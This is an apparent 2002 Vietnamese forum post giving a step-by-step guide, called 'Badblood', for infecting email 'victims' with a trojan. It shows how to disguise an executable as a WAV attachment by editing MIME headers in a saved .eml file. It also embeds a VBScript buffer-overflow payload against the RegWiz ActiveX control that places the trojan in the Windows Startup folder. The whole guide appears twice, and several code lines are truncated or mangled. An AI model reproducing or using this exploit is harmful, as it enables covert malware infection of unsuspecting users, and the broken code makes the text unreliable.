Mapcon
03-09-2002, 06:04 PM
NOTE : Đay chi la cach thuc co ban ma thoi , con ve muc đo " thiet hai " thi do " con bo " cua ban quyet đinh ! ... Neu ai co cach nao hay hon thi Post len cho anh em cung chiem nguong nhe !!!! ( Mapcon )
Badblood" la mot cong cu giup ban lam cho victim bi lay nhiem con trojan (cua ban) de dang hon qua con duong email.
Badblood la thuat ngờ u moi duoc phat hien boi Marklord, su phat hien nay giup chung ta co the chay file dinh kem (attached files) trong mail, ma` dac biet la nguoi su dung khong the biet duoc.
Badblood su dung script hidden, no khong chi anh huong den Outlook Express ma con lam anh huong toi tat ca nhung nguoi su dung IE5.0 voi Outlook Express di ke`m (install khi cai Windows), su dung Windows95 hay Windows98.
Ngay ca khi nguoi dung su dung cac trinh Mail client nhu Netscape Messager,(Eudora thi toi chua test) v.v.., se deu bi lay nhiem ca neu nhu Open file *.eml ma` toi sap huong dan ban cach tao ra chung. Ban con co the lam lay nhiem ca nguoi dung dich vu Hotmail, hoac HTML-mail, nhung chu y la ho *bat buoc* phai mo file *.eml thi
moi bi lay nhiem (:<
Buoc1Rat quan trong)
Chung ta phai vao Internet Explorer -> Option -> Security Tab, nhan Custom Level, va tat (able) tat ca
chuc nang cho phep chay Script(Neu khong chinh may ban se bi nhiem)
Buoc2:
Chuan bi 1 con virus, trojan,backdoor, etc., 1 chuong trinh dung de Edit nhu EditPlus, TextPad.
Buoc3:
+Chay Outlook Express, nhan New Message ->Format->Background->Picures (or Sound) (vi du file ding.wav
chang han)
+ Attach them 1 file trojan, hoac virus = nu't Attach (dat ten la file.exe chang han)
+ Save ca'i email na`y ra mot thu muc nao do' tren o cung.
Buoc4:
Dung EditPlus hoac TextPad, hoac 1 chuong trinh nao do dung de edit text, mo file *.eml nay ra. Trong phan source code cua file nay se co dong nhu sau:
Ban hay Cat dong sau:
Content-position: attachment;
filename="file.exe"
- Va dan vao phan dinh dang file ding.wav, no se trong nhu sau:
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-position: attachment; {Chu thich: 2 dong duoi nay la dan vao thi no moi hien ra nhu vay}
filename="file.exe"
- Sau do vao phan dinh dang attachement ding.wav ta cat dong
Content-ID sau:
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- dan no vao phan dinh dang cua attachement file.exe. No se trong giong nhu the nay:
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- Sau do ban Save file *.eml ban vua chinh sua nay. Roi chay no' , ban se thay o phan Attach file se xuat hien cai ten [file.exe], nhung thuc chat day khong phai la cai file trojan file.exe that su dau (ban hay nhin lai dung luong cua no', dung luong cua no'=dung luong cai file ding.wav day!)
Hay xoa (Remove) cai file.exe di bang cach nhan chuot phai vao no', chon Remove.
- Bay gio ban vao phan View hoac nhan Alt + V, danh dau vao phan Source Edit. Ban se thay OE hien len 3 nut Edit, Source, Preview o cuoi phia duoi buc thu, va ban dang o phan Edit, hay nhan chuot vao phan Source roi dan doan script sau vao:
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(20
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(24 +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:windowstempd*.tmp
c:windowsstartm~1programsstartupfile.exe"
RegWizObj.InvokeRegWizard(expstr)
</script>
- Save su thay doi vua roi lai. The la xong, ban co the gui no' di cho cac victim duoc roi day.
Badblood" la mot cong cu giup ban lam cho victim bi lay nhiem con trojan (cua ban) de dang hon qua con duong email.
Badblood la thuat ngờ u moi duoc phat hien boi Marklord, su phat hien nay giup chung ta co the chay file dinh kem (attached files) trong mail, ma` dac biet la nguoi su dung khong the biet duoc.
Badblood su dung script hidden, no khong chi anh huong den Outlook Express ma con lam anh huong toi tat ca nhung nguoi su dung IE5.0 voi Outlook Express di ke`m (install khi cai Windows), su dung Windows95 hay Windows98.
Ngay ca khi nguoi dung su dung cac trinh Mail client nhu Netscape Messager,(Eudora thi toi chua test) v.v.., se deu bi lay nhiem ca neu nhu Open file *.eml ma` toi sap huong dan ban cach tao ra chung. Ban con co the lam lay nhiem ca nguoi dung dich vu Hotmail, hoac HTML-mail, nhung chu y la ho *bat buoc* phai mo file *.eml thi
moi bi lay nhiem (:<
Buoc1Rat quan trong)
Chung ta phai vao Internet Explorer -> Option -> Security Tab, nhan Custom Level, va tat (able) tat ca
chuc nang cho phep chay Script(Neu khong chinh may ban se bi nhiem)
Buoc2:
Chuan bi 1 con virus, trojan,backdoor, etc., 1 chuong trinh dung de Edit nhu EditPlus, TextPad.
Buoc3:
+Chay Outlook Express, nhan New Message ->Format->Background->Picures (or Sound) (vi du file ding.wav
chang han)
+ Attach them 1 file trojan, hoac virus = nu't Attach (dat ten la file.exe chang han)
+ Save ca'i email na`y ra mot thu muc nao do' tren o cung.
Buoc4:
Dung EditPlus hoac TextPad, hoac 1 chuong trinh nao do dung de edit text, mo file *.eml nay ra. Trong phan source code cua file nay se co dong nhu sau:
Ban hay Cat dong sau:
Content-position: attachment;
filename="file.exe"
- Va dan vao phan dinh dang file ding.wav, no se trong nhu sau:
Content-Type: audio/wav;
name="Ding.wav"
Content-Transfer-Encoding: base64
Content-position: attachment; {Chu thich: 2 dong duoi nay la dan vao thi no moi hien ra nhu vay}
filename="file.exe"
- Sau do vao phan dinh dang attachement ding.wav ta cat dong
Content-ID sau:
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- dan no vao phan dinh dang cua attachement file.exe. No se trong giong nhu the nay:
Content-Type: application/x-msdownload;
name="file.exe"
Content-Transfer-Encoding: base64
Content-ID: <002801bf41c9$95325940$0100007f@computername>
- Sau do ban Save file *.eml ban vua chinh sua nay. Roi chay no' , ban se thay o phan Attach file se xuat hien cai ten [file.exe], nhung thuc chat day khong phai la cai file trojan file.exe that su dau (ban hay nhin lai dung luong cua no', dung luong cua no'=dung luong cai file ding.wav day!)
Hay xoa (Remove) cai file.exe di bang cach nhan chuot phai vao no', chon Remove.
- Bay gio ban vao phan View hoac nhan Alt + V, danh dau vao phan Source Edit. Ban se thay OE hien len 3 nut Edit, Source, Preview o cuoi phia duoi buc thu, va ban dang o phan Edit, hay nhan chuot vao phan Source roi dan doan script sau vao:
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00"
id="RegWizObj"></object>
<script language="VbScript" >
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA"
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(20
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(24 +
Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + "move c:windowstempd*.tmp
c:windowsstartm~1programsstartupfile.exe"
RegWizObj.InvokeRegWizard(expstr)
</script>
- Save su thay doi vua roi lai. The la xong, ban co the gui no' di cho cac victim duoc roi day.